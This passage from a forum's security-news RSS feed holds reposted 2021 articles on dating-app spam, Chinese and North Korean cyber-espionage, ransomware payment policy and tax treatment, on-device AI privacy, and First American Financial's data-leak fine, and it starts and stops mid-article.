		In Grindr's case, however, because spam messages are often plain text strings, it would likely be much easier for the company to sweep for and remove such messages automatically.
	</p>

	<p>
		 
	</p>

	<p>
		In March this year, the company had said:
	</p>

	<p>
		 
	</p>

	<p>
		"Grindr is fighting and banning spam non-stop, 24/7, 365 days a year. Spam is our most reported and banned category."
	</p>

	<p>
		 
	</p>

	<p>
		"The fight against spammers, particularly on an instantaneous chat service where users seek significant privacy, is a big challenge," <a href="https://blog.grindr.com/blog/spam-banning-support-and-moderation-update" rel="external nofollow" target="_blank">said</a> Alice Hunsberger, Grindr's Senior Director of Customer Experience.
	</p>

	<p>
		 
	</p>

	<p>
		Using automation, Grindr states that it strives to detect and remove spam proactively, eliminating the need for the user to manually <a href="https://help.grindr.com/hc/en-us/articles/217763127-Blocking-and-Reporting-Users" rel="external nofollow" target="_blank">report it</a>—although spammers have often remained a step ahead.
	</p>

	<p>
		 
	</p>

	<p>
		"We use a number of systems in the fight, including a new AI-powered service that helps us detect 'non-human' usage of Grindr."
	</p>

	<p>
		 
	</p>

	<p>
		"Though we are constantly surprised how often we find users with the amazing ability to behave like a machine," further explained Hunsberger.
	</p>

	<p>
		 
	</p>

	<p>
		Users on dating apps should refrain from visiting dubious links and ideally <a href="https://www.help.tinder.com/hc/en-us/articles/115003359426-How-do-I-report-someone-" rel="external nofollow" target="_blank">report spam profiles</a> to keep online dating communities safe for everyone.
	</p>

	<p>
		 
	</p>

	<p>
		BleepingComputer reached out to Tinder and Grindr for comment well before publishing this article but we have not heard back.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/technology/tinder-spam-campaign-hides-handwritten-links-in-profile-images/" rel="external nofollow">Tinder spam campaign hides "handwritten" links in profile images</a>
</p>
]]></description><guid isPermaLink="false">734</guid><pubDate>Sat, 19 Jun 2021 22:47:06 +0000</pubDate></item><item><title>Cyber espionage by Chinese hackers in neighbouring nations is on the rise</title><link>https://nsaneforums.com/news/security-privacy-news/cyber-espionage-by-chinese-hackers-in-neighbouring-nations-is-on-the-rise-r729/</link><description><![CDATA[<p>
	<span style="font-size:22px;"><strong>Cyber espionage by Chinese hackers in neighbouring nations is on the rise</strong></span>
</p>

<p>
	 
</p>

<p>
	A string of cyber espionage campaigns dating all the way back to 2014 and focused on gathering military intelligence from neighbouring countries have been linked to a Chinese military-intelligence apparatus.
</p>

<p>
	 
</p>

<p>
	In a wide-ranging report published by Massachusetts-headquartered Recorded Future this week, the cybersecurity firm's Insikt Group said it identified ties between a group it tracks as "RedFoxtrot" and the People's Liberation Army (PLA) Unit 69010 operating out of Ürümqi, the capital of the Xinjiang Uyghur Autonomous Region in the country.
</p>

<p>
	 
</p>

<p>
	Previously called the Lanzhou Military Region's Second Technical Reconnaissance Bureau, Unit 69010 is a military cover for a Technical Reconnaissance Bureau (TRB) within China's Strategic Support Force (SSF) Network Systems Department (NSD).
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="cyberattack.jpg" class="ipsImage" data-ratio="75.10" height="540" width="677" src="https://thehackernews.com/images/-PhDtQcGIAUk/YM2E4m8pnXI/AAAAAAAAC60/A7IzboS3GKMvX6QNTOZSibCzcEmxjR86wCLcBGAsYHQ/s0/cyberattack.jpg" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	The connection to PLA Unit 69010 stems from what the researchers said were "lax operational security measures" adopted by an unnamed suspected RedFoxtrot threat actor, whose online persona disclosed the physical address of the reconnaissance bureau and has had a history of affiliating with the PLA's former Communications Command Academy in Wuhan.
</p>

<p>
	 
</p>

<p>
	RedFoxtrot is noted to target government, defense, and telecommunications sectors across Central Asia, India, and Pakistan, with intrusions in the last six months directed against three Indian aerospace and defense contractors as well as major telecommunications providers and government agencies in Afghanistan, India, Kazakhstan, and Pakistan.
</p>

<p>
	 
</p>

<p>
	"Activity over this period showed a particular focus on Indian targets, which occurred at a time of heightened border tensions between India and the People's Republic of China," the researchers said.
</p>

<p>
	 
</p>

<p>
	Attacks staged by the adversary involved an assortment of open- and closed-source tools that have been shared across Chinese cyberespionage groups, including PlugX, Royal Road RTF weaponizer, QUICKHEAL, PCShare, IceFog, and Poison Ivy RAT.
</p>

<p>
	 
</p>

<p>
	Also observed is the use of AXIOMATICASYMPTOTE infrastructure, which encompasses a modular Windows backdoor called ShadowPad that has been previously attributed to APT41 and subsequently shared between other Chinese state-backed actors.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="hacking-news.jpg" class="ipsImage" data-ratio="74.31" height="530" width="720" src="https://thehackernews.com/images/-jvQnwqx7ZT4/YM2FmYi-6zI/AAAAAAAAC68/3CYpLGCrNIo45OXnZvgMkszIKn93Hh1PACLcBGAsYHQ/s0/hacking-news.jpg" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	Furthermore, domains registered by RedFoxtrot — "inbsnl.ddns[.]info" and "adtl.mywire[.]org" — suggest that the threat actor may have set its sights on Indian telecom service provider Bharat Sanchar Nigam Limited (BSNL) and a Bengaluru-based company called Alpha Design Technologies Limited (ADTL) that specializes in research and development of missile, radar, and satellite systems.
</p>

<p>
	 
</p>

<p>
	The development comes more than three months after another China-linked threat group, dubbed RedEcho, was uncovered targeting India's power grid, including a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based Power System Operation Corporation Limited.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/06/cyber-espionage-by-chinese-hackers-in.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">729</guid><pubDate>Sat, 19 Jun 2021 13:07:21 +0000</pubDate></item><item><title>Hit by a ransomware attack? Your payment may be deductible</title><link>https://nsaneforums.com/news/security-privacy-news/hit-by-a-ransomware-attack-your-payment-may-be-deductible-r728/</link><description><![CDATA[<p>
	<span style="font-size:28px;"><strong>Hit by a ransomware attack? Your payment may be deductible</strong></span>
</p>

<p>
	 
</p>

<p>
	As ransomware attacks surge, the FBI is doubling down on its guidance to affected businesses: Don't pay the cybercriminals. But the U.S. government also offers a little-noticed incentive for those who do pay: The ransoms may be tax deductible.
</p>

<p>
	 
</p>

<p>
	The IRS offers no formal guidance on ransomware payments, but multiple tax experts interviewed by The Associated Press said deductions are usually allowed under law and established guidance. It's a "silver lining" to ransomware victims, as some tax lawyers and accountants put it.
</p>

<p>
	 
</p>

<p>
	But those looking to discourage payments are less sanguine. They fear the deduction is a potentially problematic incentive that could entice businesses to pay ransoms against the advice of law enforcement. At a minimum, they say, the deductibility sends a discordant message to businesses under duress.
</p>

<p>
	 
</p>

<p>
	"It seems a little incongruous to me," said Rep. John Katko, the top Republican on the House Committee on Homeland Security.
</p>

<p>
	 
</p>

<p>
	Deductibility is a piece of a bigger quandary stemming from the rise in ransomware attacks, in which cybercriminals scramble computer data and demand payment for unlocking the files. The government doesn't want payments that fund criminal gangs and could encourage more attacks. But failing to pay can have devastating consequences for businesses and potentially for the economy overall.
</p>

<p>
	 
</p>

<p>
	A ransomware attack on Colonial Pipeline last month led to gas shortages in parts of the United States. The company, which transports about 45% of fuel consumed on the East Coast, paid a ransom of 75 bitcoin—then valued at roughly $4.4 million. An attack on JBS SA, the world's largest meat processing company, threatened to disrupt food supplies. The company said it had paid the equivalent of $11 million to hackers who broke into its computer system.
</p>

<p>
	 
</p>

<p>
	Ransomware has become a multibillion-dollar business, and the average payment was more than $310,000 last year, up 171% from 2019, according to Palo Alto Networks.
</p>

<p>
	 
</p>

<p>
	The companies that pay ransomware demands directly are well within their rights to claim a deduction, tax experts said. To be tax deductible, business expenses should be considered ordinary and necessary. Companies have long been able to deduct losses from more traditional crimes, such as robbery or embezzlement, and experts say ransomware payments are usually valid, too.
</p>

<p>
	 
</p>

<p>
	"I would counsel a client to take a deduction for it," says Scott Harty, a corporate tax attorney with Alston &amp; Bird. "It fits the definition of an ordinary and necessary expense."
</p>

<p>
	 
</p>

<p>
	Don Williamson, a tax professor at the Kogod School of Business at American University, wrote a paper about the tax consequences of ransomware payments in 2017. Since then, he said, the rise of ransomware attacks has only strengthened the case for the IRS to allow ransomware payments as tax deductions.
</p>

<p>
	 
</p>

<p>
	"It's becoming more common, so therefore it becomes more ordinary," he said.
</p>

<p>
	 
</p>

<p>
	That's all the more reason, critics say, to disallow ransomware payments as tax deductions.
</p>

<p>
	 
</p>

<p>
	"The cheaper we make it to pay that ransom, then the more incentives we're creating for companies to pay, and the more incentives we're creating for companies to pay, the more incentive we're creating for criminals to continue," said Josephine Wolff, a cybersecurity policy professor at the Fletcher School of Tufts University.
</p>

<p>
	 
</p>

<p>
	For years, ransomware was more of an economic nuisance than a major national threat. But attacks launched by foreign cybergangs out of reach of U.S. law enforcement have proliferated in scale over the past year and thrust the problem of ransomware onto the front pages.
</p>

<p>
	 
</p>

<p>
	In response, top U.S. law enforcement officials have urged companies not to meet ransomware demands.
</p>

<p>
	 
</p>

<p>
	"It is our policy, it is our guidance, from the FBI, that companies should not pay the ransom for a number of reasons," FBI Director Christopher Wray testified this month before Congress. That message was echoed at another hearing this week by Eric Goldstein, a top official at the Department of Homeland Security's Cybersecurity &amp; Infrastructure Security Agency.
</p>

<p>
	 
</p>

<p>
	Officials warn that payments lead to more ransomware attacks. "We're in this boat we're in now because over the last several years people have paid the ransom," Stephen Nix, assistant to the special agent in charge at the U.S. Secret Service, said at a recent summit on cybersecurity.
</p>

<p>
	 
</p>

<p>
	It's unclear how many companies that pay ransomware payments avail themselves of the tax deductions. When asked at a congressional hearing whether the company would pursue a tax deduction for the payment, Colonial CEO Joseph Blount said he was unaware that was a possibility.
</p>

<p>
	 
</p>

<p>
	"Great question. I had no idea about that. Not aware of that at all," he said.
</p>

<p>
	 
</p>

<p>
	There are limits to the deduction. If the loss to the company is covered by cyber insurance—something that also is becoming more common—the company can't take a deduction for the payment that's made by the insurer.
</p>

<p>
	 
</p>

<p>
	The number of active cyber insurance policies jumped from 2.2 million to 3.6 million from 2016 to 2019, a 60% increase, according to a new report from the Government Accountability Office, Congress' auditing arm. Linked to that was a 50% increase in insurance premiums paid, from $2.1 billion to $3.1 billion.
</p>

<p>
	 
</p>

<p>
	The Biden administration has pledged to make curbing ransomware a priority in the wake of a series of high-profile intrusions and said it is reviewing the U.S. government's policies related to ransomware. It has not provided any detail about what changes, if any, it may make related to the tax deductibility of ransomware.
</p>

<p>
	 
</p>

<p>
	"The IRS is aware of this and looking into it," said IRS spokesperson Robyn Walker.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://techxplore.com/news/2021-06-ransomware-payment-deductible.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">728</guid><pubDate>Sat, 19 Jun 2021 13:00:48 +0000</pubDate></item><item><title>State Legislatures Consider Bans on Ransomware Payments</title><link>https://nsaneforums.com/news/security-privacy-news/state-legislatures-consider-bans-on-ransomware-payments-r727/</link><description><![CDATA[<p>
	<span style="font-size:28px;"><strong>State Legislatures Consider Bans on Ransomware Payments</strong></span>
</p>

<p>
	 
</p>

<p>
	As ransomware attacks continue to dominate the news cycle, legislation has recently been introduced in several states that would place limits on certain entities’ ability to pay a ransom payment in the event of a ransomware attack. Although the proposed limits would generally apply to state agencies and other local governmental authorities, certain state proposals may also apply to state agencies’ IT service providers, entities that receive public funds, and/or business entities more broadly. The following summary provides an overview of five pending bills in New York, North Carolina, Pennsylvania, and Texas.
</p>

<p>
	 
</p>

<p>
	<strong>New York</strong>
</p>

<p>
	 
</p>

<p>
	NY S 6806 would broadly prohibit business entities and healthcare entities, in addition to governmental entities within the state, from paying a ransom in the event of a ransomware attack. The proposed legislation would also create a new notification requirement for governmental entities, which would be required to report any cyber incidents, as defined in the law, and to report ransomware attacks to the New York State Division of Homeland Security and Emergency Services. “Business entity” is defined as any legal entity that conducts business in the state of New York, and “health care entity” is defined as any health care facility that is regulated by the New York Department of Health.
</p>

<p>
	 
</p>

<p>
	Another pending proposal in New York, NY S 6154, would create a Cyber Security Enhancement Fund to be used for the purpose of upgrading cybersecurity in local governments throughout New York state, including but not limited to cities with a population of one million or less. The legislation would also prohibit the use of local and state taxpayer funds to pay ransoms in response to ransomware attacks, beginning on January 1, 2024.
</p>

<p>
	 
</p>

<p>
	<strong>North Carolina</strong>
</p>

<p>
	 
</p>

<p>
	NC H 813 would prohibit state agencies and local government entities from paying a ransom payment or otherwise communicating with an entity that has engaged in a ransomware incident. Local government entities would also be required to consult the state Department of Information Technology if they receive a ransom demand.
</p>

<p>
	 
</p>

<p>
	<strong>Pennsylvania</strong>
</p>

<p>
	 
</p>

<p>
	PA S 726 would prohibit the use of state and local taxpayer money or other public money to pay a ransom payment. The one exception to this ban would be if the governor of Pennsylvania has declared a disaster emergency and authorizes a state agency to pay a ransom payment in connection with the emergency. Notably, in addition to creating a new notification requirement for state agencies, the bill would also require IT managed service providers of state agencies to notify the relevant agencies within one hour of discovery of a ransomware incident.
</p>

<p>
	 
</p>

<p>
	<strong>Texas</strong>
</p>

<p>
	 
</p>

<p>
	In addition to enhancing broad cybersecurity and emergency preparedness measures for state agencies, TX 3892 would prohibit local government entities or “political subdivisions” from making ransom payments related to a ransomware attack. The law would also require political subdivisions to report ransomware attacks to both the attorney general and the Department of Information Resources.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.alstonprivacy.com/state-legislatures-consider-bans-on-ransomware-payments/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">727</guid><pubDate>Sat, 19 Jun 2021 12:40:43 +0000</pubDate></item><item><title>North Korea Exploited VPN Flaw to Hack South's Nuclear Research Institute</title><link>https://nsaneforums.com/news/security-privacy-news/north-korea-exploited-vpn-flaw-to-hack-souths-nuclear-research-institute-r726/</link><description><![CDATA[<p>
	<span style="font-size:22px;"><strong>North Korea Exploited VPN Flaw to Hack South's Nuclear Research Institute</strong></span>
</p>

<p>
	 
</p>

<p>
	South Korea's state-run Korea Atomic Energy Research Institute (KAERI) on Friday disclosed that its internal network was infiltrated by suspected attackers operating out of its northern counterpart.
</p>

<p>
	 
</p>

<p>
	The intrusion is said to have taken place on May 14 through a vulnerability in an unnamed virtual private network (VPN) vendor and involved a total of 13 IP addresses, one of which — "27.102.114[.]89" — has been previously linked to a state-sponsored threat actor dubbed Kimsuky.
</p>

<p>
	 
</p>

<p>
	KAERI, established in 1959 and situated in the city of Daejeon, is a government-funded research institute that designs and develops nuclear technologies related to reactors, fuel rods, radiation fusion, and nuclear safety.
</p>

<p>
	 
</p>

<p>
	Following the intrusion, the think tank said it took steps to block the attacker's IP addresses in question and applied necessary security patches to the vulnerable VPN solution. "Currently, the Atomic Energy Research Institute is investigating the subject of the hacking and the amount of damage," the entity said in a statement.
</p>

<p>
	 
</p>

<p>
	The development comes following a report from SISA Journal, which disclosed the breach, alleging that the agency was attempting to cover up the hack by denying such an incident took place. KAERI attributed it to a "mistake in the response of the working-level staff."
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="hacking.jpg" class="ipsImage" data-ratio="57.78" height="411" width="720" src="https://thehackernews.com/images/-Pv66AhJoH3Q/YM2OI36IqgI/AAAAAAAAC7M/-PU0xUphYKsxU79QvG2cdKgq0ICzbPcegCLcBGAsYHQ/s728-e1000/hacking.jpg" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	Active since 2012, Kimsuky (aka Velvet Chollima, Black Banshee, or Thallium) is a North Korean threat actor known for its cyberespionage campaigns targeting think tanks and nuclear power operators in South Korea.
</p>

<p>
	 
</p>

<p>
	Earlier this month, cybersecurity firm Malwarebytes disclosed a wave of attacks undertaken by the adversary to strike high-profile government officials in the country by installing an Android and Windows backdoor called AppleSeed for amassing valuable information.
</p>

<p>
	 
</p>

<p>
	The targeted entities involved the Ministry of Foreign Affairs, Ambassador of the Embassy of Sri Lanka to the State, International Atomic Energy Agency (IAEA) Nuclear Security Officer, and the Deputy Consul General at Korean Consulate General in Hong Kong, with the aforementioned IP address used for command-and-control (C2) communications.
</p>

<p>
	 
</p>

<p>
	It is not immediately clear what VPN vulnerability was exploited to breach the network. But it's worth noting that unpatched VPN systems from Pulse Secure, SonicWall, Fortinet FortiOS, and Citrix have been subjected to attacks by multiple threat actors in recent years.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/06/north-korea-exploited-vpn-flaw-to-hack.html" rel="external nofollow">Source</a></strong>
</p>

<p>
	 
</p>

<p>
	 
</p>
]]></description><guid isPermaLink="false">726</guid><pubDate>Sat, 19 Jun 2021 12:37:07 +0000</pubDate></item><item><title>Apple and Google&#x2019;s AI wizardry promises privacy&#x2014;at a cost</title><link>https://nsaneforums.com/news/security-privacy-news/apple-and-google%E2%80%99s-ai-wizardry-promises-privacy%E2%80%94at-a-cost-r718/</link><description><![CDATA[<header>
	<h1 itemprop="headline">
		Apple and Google’s AI wizardry promises privacy—at a cost
	</h1>

	<h2 itemprop="description">
		Upgraded data protection and less reliance on the cloud could lock users in.
	</h2>
</header>

<section>
	<div itemprop="articleBody">
		<p>
			 
		</p>

		<p>
			Since the dawn of the <a href="https://www.wired.com/tag/iphone/" rel="external nofollow">iPhone</a>, many of the smarts in smartphones have come from elsewhere: the corporate computers known as the<a href="https://www.wired.com/tag/cloud-computing/" rel="external nofollow"> cloud</a>. Mobile apps sent user data cloudward for useful tasks like transcribing speech or suggesting message replies. Now<a href="https://www.wired.com/tag/apple/" rel="external nofollow"> Apple</a> and<a href="https://www.wired.com/tag/google/" rel="external nofollow"> Google</a> say<a href="https://www.wired.com/tag/smartphones/" rel="external nofollow"> smartphones</a> are smart enough to do some crucial and sensitive<a href="https://www.wired.com/tag/machine-learning/" rel="external nofollow"> machine-learning</a> tasks like those on their own.
		</p>

		<p>
			 
		</p>

		<p>
			At Apple's WWDC event<a href="https://www.wired.com/story/apple-wwdc-2021-news-recap" rel="external nofollow"> this month</a>, the company said its virtual assistant<a href="https://www.wired.com/tag/siri/" rel="external nofollow"> Siri</a> will transcribe speech without tapping the cloud in some languages on recent and future iPhones and iPads. During its own<a href="https://www.wired.com/story/google-io-2021-highlights/" rel="external nofollow"> I/O developer event last month</a>, Google said the latest version of its<a href="https://www.wired.com/tag/android/" rel="external nofollow"> Android</a> operating system has a feature dedicated to secure, on-device processing of sensitive data, called the Private Compute Core. Its initial uses include powering the version of the company's Smart Reply feature built into its mobile keyboard that can suggest responses to incoming messages.
		</p>

		<p>
			 
		</p>

		<p>
			Apple and Google both say on-device machine learning offers more privacy and snappier apps. Not transmitting personal data cuts the risk of exposure and saves time spent waiting for data to traverse the internet. At the same time, keeping data on devices aligns with the tech giants' long-term interest in keeping consumers bound into their ecosystems. People who hear their data can be processed more privately might become more willing to agree to share more data.
		</p>

		<p>
			 
		</p>
		<p>
			The companies' recent promotion of on-device machine learning comes after years of work on technology to constrain the data their clouds can "see."
		</p>

		<p>
			 
		</p>

		<p>
			In 2014, Google started gathering some data on Chrome browser usage<a href="https://security.googleblog.com/2014/10/learning-statistics-with-privacy-aided.html" rel="external nofollow"> through a technique called differential privacy</a>, which adds noise to harvested data in ways that restrict what those samples reveal about individuals. Apple has used the technique on data gathered from phones to inform emoji and typing predictions and for web browsing data.
		</p>

		<p>
			 
		</p>

		<p>
			More recently, both companies have adopted a technology called<a href="http://ai.googleblog.com/2017/04/federated-learning-collaborative.html" rel="external nofollow"> federated learning</a>. It allows a cloud-based machine-learning system to be updated without scooping in raw data; instead, individual devices process data locally and share only digested updates. As with differential privacy, the companies have discussed using federated learning only in limited cases. Google has used the technique to keep its mobile typing predictions up to date with language trends; Apple has published research on using it to<a href="https://arxiv.org/pdf/2102.08503.pdf" rel="external nofollow"> update speech-recognition models</a>.
		</p>

		<p>
			 
		</p>

		<p>
			Rachel Cummings, an assistant professor at Columbia who has previously consulted on privacy for Apple, says the rapid shift to do some machine learning on phones has been striking. "It's incredibly rare to see something going from the first conception to being deployed at scale in so few years," she says.
		</p>

		<p>
			 
		</p>

		<p>
			That progress has required not just advances in computer science but for companies to take on the practical challenges of processing data on devices owned by consumers. Google has said that its federated learning system only taps users' devices when they are plugged in, idle, and on a free Internet connection. The technique was enabled in part by improvements in the power of mobile processors.
		</p>

		<p>
			 
		</p>

		<p>
			Beefier mobile hardware also contributed to Google's <a href="https://www.wired.com/story/google-made-truly-usable-voice-assistant/" rel="external nofollow">2019 announcement</a> that voice recognition for its virtual assistant on Pixel devices would be wholly on-device, free from the crutch of the cloud. Apple's new on-device voice recognition for Siri, announced at WWDC this month, will use the "neural engine" the company<a href="https://www.wired.com/story/apples-neural-engine-infuses-the-iphone-with-ai-smarts/" rel="external nofollow"> added to its mobile processors</a> to power up machine-learning algorithms.
		</p>

		<p>
			 
		</p>

		<p>
			The technical feats are impressive. It's debatable how much they will meaningfully change users' relationship with tech giants.
		</p>

		<p>
			 
		</p>

		<p>
			Presenters at Apple's WWDC said Siri's new design was a "major update to privacy" that addressed the risk associated with accidentally transmitting audio to the cloud, saying that was users' largest privacy concern about<a href="https://www.wired.com/tag/voice-assistants/" rel="external nofollow"> voice assistants</a>. Some Siri commands—such as setting timers—can be recognized wholly locally, making for a speedy response. Yet in many cases transcribed commands to Siri—presumably including from accidental recordings—will be sent to Apple servers for software to decode and respond. Siri voice transcription will still be cloud-based for HomePod smart speakers commonly installed in bedrooms and kitchens, where accidental recording can be more concerning.
		</p>

		<p>
			 
		</p>

		<p>
			Google also promotes on-device data processing as a privacy win and has signaled it will expand the practice. The company expects partners such as Samsung that use its Android operating system to adopt the new Private Compute Core and use it for features that rely on sensitive data.
		</p>

		<p>
			 
		</p>

		<p>
			Google has also made local analysis of browsing data a feature of its proposal for<a href="https://www.wired.com/story/google-floc-privacy-ad-tracking-explainer" rel="external nofollow"> reinventing online ad targeting, dubbed FLoC</a> and claimed to be more private. Academics and some rival tech companies have said the design is likely to help Google consolidate its dominance of online ads by making targeting more difficult for other companies.
		</p>

		<p>
			 
		</p>

		<p>
			Michael Veale, a lecturer in digital rights at University College London, says on-device data processing can be a good thing but adds that the way tech companies promote it shows they are primarily motivated by a desire to keep people tied into lucrative digital ecosystems.
		</p>

		<p>
			 
		</p>

		<p>
			"Privacy gets confused with keeping data confidential, but it's also about limiting power," says Veale. "If you're a big tech company and manage to reframe privacy as only confidentiality of data, that allows you to continue business as normal and gives you license to operate."
		</p>

		<p>
			 
		</p>

		<p>
			A Google spokesperson said the company "builds for privacy everywhere computing happens" and that data sent to the Private Compute Core for processing "needs to be tied to user value." Apple did not respond to a request for comment.
		</p>

		<p>
			 
		</p>

		<p>
			Cummings of Columbia says new privacy techniques and the way companies market them add complexity to the trade-offs of digital life. Over recent years, as machine learning has become more widely deployed, tech companies have steadily expanded the range of data they collect and analyze. There is evidence some consumers misunderstand the privacy protections trumpeted by tech giants.
		</p>

		<p>
			 
		</p>

		<p>
			<a href="https://theconversation.com/people-want-data-privacy-but-dont-always-know-what-theyre-getting-143782" rel="external nofollow">A forthcoming survey study</a> from Cummings and collaborators at Boston University and the Max Planck Institute showed descriptions of differential privacy drawn from tech companies, media, and academics to 675 Americans. Hearing about the technique made people about twice as likely to report they would be willing to share data. But there was evidence that descriptions of differential privacy's benefits also encouraged unrealistic expectations. One-fifth of respondents expected their data to be protected against law enforcement searches, something differential privacy does not do. Apple's and Google's latest proclamations about on-device data processing may bring new opportunities for misunderstandings.
		</p>

		<p>
			 
		</p>

		<p>
			This story originally appeared on<a href="https://www.wired.com/story/apple-googles-ai-wizardry-promises-privacy-cost/" rel="external nofollow"> wired.com</a>.
		</p>
	</div>
</section>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/gadgets/2021/06/apple-and-googles-ai-wizardry-promises-privacy-at-a-cost/" rel="external nofollow">Apple and Google’s AI wizardry promises privacy—at a cost</a>
</p>
]]></description><guid isPermaLink="false">718</guid><pubDate>Fri, 18 Jun 2021 22:09:41 +0000</pubDate></item><item><title>First American Financial Pays Farcical $500K Fine</title><link>https://nsaneforums.com/news/security-privacy-news/first-american-financial-pays-farcical-500k-fine-r715/</link><description><![CDATA[<header>
	<div>
		<h1>
			First American Financial Pays Farcical $500K Fine
		</h1>
	</div>
</header>

<div id="primary">
	<div id="content" role="main">
		<article id="post-55971">

			<div>
				<p>
					In May 2019, KrebsOnSecurity broke the news that the website of mortgage settlement giant <a href="https://en.wikipedia.org/wiki/First_American_Corporation" rel="external nofollow" target="_blank">First American Financial Corp.</a> [<a href="https://www.marketbeat.com/stocks/NYSE/FAF/" rel="external nofollow" target="_blank">NYSE:FAF</a>] was <a href="https://krebsonsecurity.com/2019/05/first-american-financial-corp-leaked-hundreds-of-millions-of-title-insurance-records/" rel="external nofollow" target="_blank">leaking more than 800 million documents</a> — many containing sensitive financial data — related to real estate transactions dating back 16 years. This week, the U.S. Securities and Exchange Commission settled its investigation into the matter after the Fortune 500 company agreed to pay a paltry penalty of less than $500,000.
				</p>

				<p>
					 
				</p>

				<div id="attachment_47830">
					<img alt="firstamericanfinancial.jpg" aria-describedby="caption-attachment-47830" data-ratio="75.10" loading="lazy" width="719" src="https://krebsonsecurity.com/wp-content/uploads/2019/05/firstamericanfinancial.jpg">
					<p id="caption-attachment-47830">
						First American Financial Corp.
					</p>
				</div>

				<p>
					 
				</p>

				<p>
					If you bought or sold a property in the last two decades or so, chances are decent that you also gave loads of personal and financial documents to First American. According to <a href="https://www.alta.org/publications/press-release.cfm?ALTA-Reports-Title-Premium-Volume-Increases-217-Percent-in-2020" rel="external nofollow" target="_blank">data</a> from the American Land Title Association, First American is the second largest mortgage title and settlement company in the United States, handling nearly a quarter of all closings each year.
				</p>

				<p>
					 
				</p>

				<p>
					The SEC says First American derives nearly 92 percent of its revenue from its title insurance segment, earning $7.1 billion last year.
				</p>

				<p>
					 
				</p>

				<p>
					Title insurance protects homebuyers from the prospect of someone contesting their legitimacy as the new homeowner. According to <a href="https://www.simpleshowing.com/blog/who-pays-for-the-title-insurance" rel="external nofollow" target="_blank">SimpleShowing.com</a>, there are actually two title insurance policies in each transaction — one for the buyer and one for the lender (the latter also needs protection as they’re providing the mortgage to purchase the home).
				</p>

				<p>
					 
				</p>

				<p>
					Title insurance is not mandated by law, but most lenders require it as part of any mortgage transaction. In other words, if you wish to take out a mortgage on a home you will not be able to do so without giving companies like First American gobs of documents about your income, assets and liabilities — including quite a bit of sensitive financial data.
				</p>

				<p>
					 
				</p>

				<p>
					Aside from its core business competency — checking to make sure the property at issue in any real estate transaction is unencumbered by any liens or other legal claims against it — First American basically has one job: Protect the privacy and security of all these documents.
				</p>

				<p>
					 
				</p>

				<div id="attachment_47843">
					<img alt="sample-fa.jpg" aria-describedby="caption-attachment-47843" data-ratio="75.10" loading="lazy" width="719" src="https://krebsonsecurity.com/wp-content/uploads/2019/05/sample-fa.jpg">
					<p id="caption-attachment-47843">
						A redacted screenshot of one of many millions of sensitive records exposed by First American’s Web site.
					</p>
				</div>

				<p>
					 
				</p>

				<p>
					It’s easy to see why companies like First American might not view protecting this data as sacrosanct, as the entire industry’s incentive for safeguarding all those sensitive documents is somewhat misaligned.
				</p>

				<p>
					 
				</p>

				<p>
					That is to say, in the title insurance industry the parties to a real estate transaction aren’t customers; rather, they are the product. The actual customers of the title insurance companies are principally the banks which back these mortgage transactions.
				</p>

				<p>
					 
				</p>

				<p>
					We see a similar dynamic with social media platforms, where the “user” is not the customer at all but the product whose data is being bought and sold by these platforms.
				</p>

				<p>
					 
				</p>

				<p>
					Roughly five months before KrebsOnSecurity notified First American that anyone with a web browser could view sensitive documents in its “Eagle Pro” database online just by changing some characters at the end of a link, an internal security audit at First American flagged the exact same vulnerability.
				</p>

				<p>
					 
				</p>

				<p>
					But the company never acted to fix it until the news media came calling.
				</p>

				<p>
					 
				</p>

				<p>
					The SEC’s <a href="https://www.sec.gov/litigation/admin/2021/34-92176.pdf" rel="external nofollow" target="_blank">administrative proceeding</a> (PDF) explains how things slipped through the cracks. Under First American’s documented vulnerability remediation policies, the data leak was classified as a security weakness with a “level 3” severity, which placed it in the “medium risk” category and required remediation within 45 days.
				</p>

				<p>
					 
				</p>

				<p>
					But rather than recording the vulnerability as a level 3 severity, due to a clerical error the vulnerability was erroneously entered as a level 2 or “low risk” severity in First American’s automated tracking system. Level 2 issues required remediation within 90 days. Even so, First American missed that mark.
				</p>

				<p>
					 
				</p>

				<p>
					The SEC said that under First American’s remediation policies, if the person responsible for fixing the problem is unable to do so based on the timeframes listed above, that employee must have their management contact the company’s information security department to discuss their remediation plan and proposed time estimate.
				</p>

				<p>
					 
				</p>

				<p>
					“If it is not technically possible to remediate the vulnerability, or if remediation is cost prohibitive, the [employee] and their management must contact Information Security to obtain a waiver or risk acceptance approval from the CISO,” the SEC explained. “The [employee] did not request a waiver or risk acceptance from the CISO.”
				</p>

				<p>
					 
				</p>

				<p>
					So, someone within First American accepted the risk, but that person neglected to ensure the higher-ups within the company also were comfortable with that risk. It’s difficult not to hum a tune whenever the phrase “accepted the risk” comes up if you’ve ever seen <a href="https://www.youtube.com/watch?v=9IG3zqvUqJY" rel="external nofollow" target="_blank">this excellent infosec industry parody</a>.
				</p>

				<p>
					 
				</p>


				<p>
					 
				</p>

				<p>
					The SEC took aim at First American because a few days after our May 24, 2019 story ran, the company issued an 8-K filing with the agency stating First American had no prior indication of any vulnerability.
				</p>

				<p>
					 
				</p>

				<p>
					“That statement demonstrated that First American’s senior management was not properly informed of the prior report of a vulnerability and a failure to remediate the problem,” <a href="https://www.jdsupra.com/legalnews/first-american-financial-corporation-1557953/" rel="external nofollow" target="_blank">wrote</a> Michael Volkov, a 30-year federal prosecutor who now runs The Volkov Law Group in Washington, D.C.
				</p>

				<p>
					 
				</p>

				<p>
